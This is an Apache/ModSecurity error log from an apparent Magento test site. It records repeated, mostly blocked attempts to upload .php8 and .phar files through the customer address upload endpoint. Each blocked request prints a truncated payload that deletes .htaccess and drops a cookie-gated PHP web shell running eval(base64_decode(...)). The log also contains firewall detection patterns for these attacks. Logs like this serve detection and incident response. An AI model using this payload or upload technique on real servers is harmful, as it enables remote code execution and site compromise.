[Mon Feb 23 09:45:47.284560 2026] [:error] [pid 2269589] [client 176.195.127.156:56760] [client 176.195.127.156] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/x/9x88364f428d25.php8"] [unique_id "aZwTu9sSW5WxefazdoTFrwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 23 09:45:47.287002 2026] [:error] [pid 2269589] [client 176.195.127.156:56760] [client 176.195.127.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/x/9x88364f428d25.php8"] [unique_id "aZwTu9sSW5WxefazdoTFrwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 23 09:45:47.287188 2026] [:error] [pid 2269589] [client 176.195.127.156:56760] [client 176.195.127.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/x/9x88364f428d25.php8"] [unique_id "aZwTu9sSW5WxefazdoTFrwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 23 17:55:22.031525 2026] [php:error] [pid 2278496] [client 20.107.198.51:30544] script '/var/www/magento.test.indacotrentino.com/www/pub/images/m.php' not found or unable to stat
[Tue Feb 24 03:23:46.134309 2026] [php:error] [pid 2289848] [client 20.104.114.39:37783] script '/var/www/magento.test.indacotrentino.com/www/pub/images/m.php' not found or unable to stat
[Tue Feb 24 04:52:50.539290 2026] [:error] [pid 2289851] [client 89.239.157.171:53864] [client 89.239.157.171] ModSecurity: Rule 7f2071d79be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/8/q888364f428d25.phar"] [unique_id "aZ0gkkPnkRESRZ4xQH44CQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 04:52:50.539807 2026] [:error] [pid 2289851] [client 89.239.157.171:53864] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/8/q888364f428d25.phar"] [unique_id "aZ0gkkPnkRESRZ4xQH44CQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 04:52:50.542216 2026] [:error] [pid 2289851] [client 89.239.157.171:53864] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/8/q888364f428d25.phar"] [unique_id "aZ0gkkPnkRESRZ4xQH44CQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 04:52:50.542402 2026] [:error] [pid 2289851] [client 89.239.157.171:53864] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/8/q888364f428d25.phar"] [unique_id "aZ0gkkPnkRESRZ4xQH44CQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 04:52:50.873446 2026] [:error] [pid 2289851] [client 89.239.157.171:53864] [client 89.239.157.171] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: q888364f428d25.php8 found within FILES:custom_attributes[country_id]: q888364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZ0gkkPnkRESRZ4xQH44CgAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/8/q888364f428d25.phar
[Tue Feb 24 04:52:50.874076 2026] [:error] [pid 2289851] [client 89.239.157.171:53864] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZ0gkkPnkRESRZ4xQH44CgAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/8/q888364f428d25.phar
[Tue Feb 24 04:52:50.874279 2026] [:error] [pid 2289851] [client 89.239.157.171:53864] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZ0gkkPnkRESRZ4xQH44CgAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/8/q888364f428d25.phar
[Tue Feb 24 04:52:51.332465 2026] [:error] [pid 2289851] [client 89.239.157.171:53864] [client 89.239.157.171] ModSecurity: Rule 7f2071d79be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/8/q888364f428d25.php8"] [unique_id "aZ0gk0PnkRESRZ4xQH44CwAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 04:52:51.332955 2026] [:error] [pid 2289851] [client 89.239.157.171:53864] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/8/q888364f428d25.php8"] [unique_id "aZ0gk0PnkRESRZ4xQH44CwAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 04:52:51.335461 2026] [:error] [pid 2289851] [client 89.239.157.171:53864] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/8/q888364f428d25.php8"] [unique_id "aZ0gk0PnkRESRZ4xQH44CwAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 04:52:51.335667 2026] [:error] [pid 2289851] [client 89.239.157.171:53864] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/8/q888364f428d25.php8"] [unique_id "aZ0gk0PnkRESRZ4xQH44CwAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 23:55:14.800920 2026] [:error] [pid 2297938] [client 176.195.127.156:47618] [client 176.195.127.156] ModSecurity: Rule 7f2072781be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/p/op88364f428d25.phar"] [unique_id "aZ4sUpJTRyNt5flTmuxlLwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 23:55:14.801448 2026] [:error] [pid 2297938] [client 176.195.127.156:47618] [client 176.195.127.156] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/p/op88364f428d25.phar"] [unique_id "aZ4sUpJTRyNt5flTmuxlLwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 23:55:14.803861 2026] [:error] [pid 2297938] [client 176.195.127.156:47618] [client 176.195.127.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/p/op88364f428d25.phar"] [unique_id "aZ4sUpJTRyNt5flTmuxlLwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 23:55:14.804046 2026] [:error] [pid 2297938] [client 176.195.127.156:47618] [client 176.195.127.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/p/op88364f428d25.phar"] [unique_id "aZ4sUpJTRyNt5flTmuxlLwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 23:55:14.988981 2026] [:error] [pid 2297938] [client 176.195.127.156:47618] [client 176.195.127.156] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: op88364f428d25.php8 found within FILES:custom_attributes[country_id]: op88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZ4sUpJTRyNt5flTmuxlMAAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/p/op88364f428d25.phar
[Tue Feb 24 23:55:14.989651 2026] [:error] [pid 2297938] [client 176.195.127.156:47618] [client 176.195.127.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZ4sUpJTRyNt5flTmuxlMAAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/p/op88364f428d25.phar
[Tue Feb 24 23:55:14.989856 2026] [:error] [pid 2297938] [client 176.195.127.156:47618] [client 176.195.127.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZ4sUpJTRyNt5flTmuxlMAAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/p/op88364f428d25.phar
[Tue Feb 24 23:55:15.238152 2026] [:error] [pid 2297938] [client 176.195.127.156:47618] [client 176.195.127.156] ModSecurity: Rule 7f2072781be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/p/op88364f428d25.php8"] [unique_id "aZ4sU5JTRyNt5flTmuxlMQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 23:55:15.238626 2026] [:error] [pid 2297938] [client 176.195.127.156:47618] [client 176.195.127.156] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/p/op88364f428d25.php8"] [unique_id "aZ4sU5JTRyNt5flTmuxlMQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 23:55:15.240933 2026] [:error] [pid 2297938] [client 176.195.127.156:47618] [client 176.195.127.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/p/op88364f428d25.php8"] [unique_id "aZ4sU5JTRyNt5flTmuxlMQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 24 23:55:15.241107 2026] [:error] [pid 2297938] [client 176.195.127.156:47618] [client 176.195.127.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/p/op88364f428d25.php8"] [unique_id "aZ4sU5JTRyNt5flTmuxlMQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 25 19:14:01.031582 2026] [:error] [pid 2312879] [client 46.149.66.101:42470] [client 46.149.66.101] ModSecurity: Rule 7f453e629be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/l/ll88364f428d25.phar"] [unique_id "aZ876WXxsr5IXP-ltRib7AAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 25 19:14:01.032118 2026] [:error] [pid 2312879] [client 46.149.66.101:42470] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/l/ll88364f428d25.phar"] [unique_id "aZ876WXxsr5IXP-ltRib7AAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 25 19:14:01.034598 2026] [:error] [pid 2312879] [client 46.149.66.101:42470] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/l/ll88364f428d25.phar"] [unique_id "aZ876WXxsr5IXP-ltRib7AAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 25 19:14:01.034808 2026] [:error] [pid 2312879] [client 46.149.66.101:42470] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/l/ll88364f428d25.phar"] [unique_id "aZ876WXxsr5IXP-ltRib7AAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 25 19:14:02.958148 2026] [:error] [pid 2312879] [client 46.149.66.101:42470] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: ll88364f428d25.php8 found within FILES:custom_attributes[country_id]: ll88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZ876mXxsr5IXP-ltRib7QAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/l/l/ll88364f428d25.phar
[Wed Feb 25 19:14:02.958870 2026] [:error] [pid 2312879] [client 46.149.66.101:42470] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZ876mXxsr5IXP-ltRib7QAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/l/l/ll88364f428d25.phar
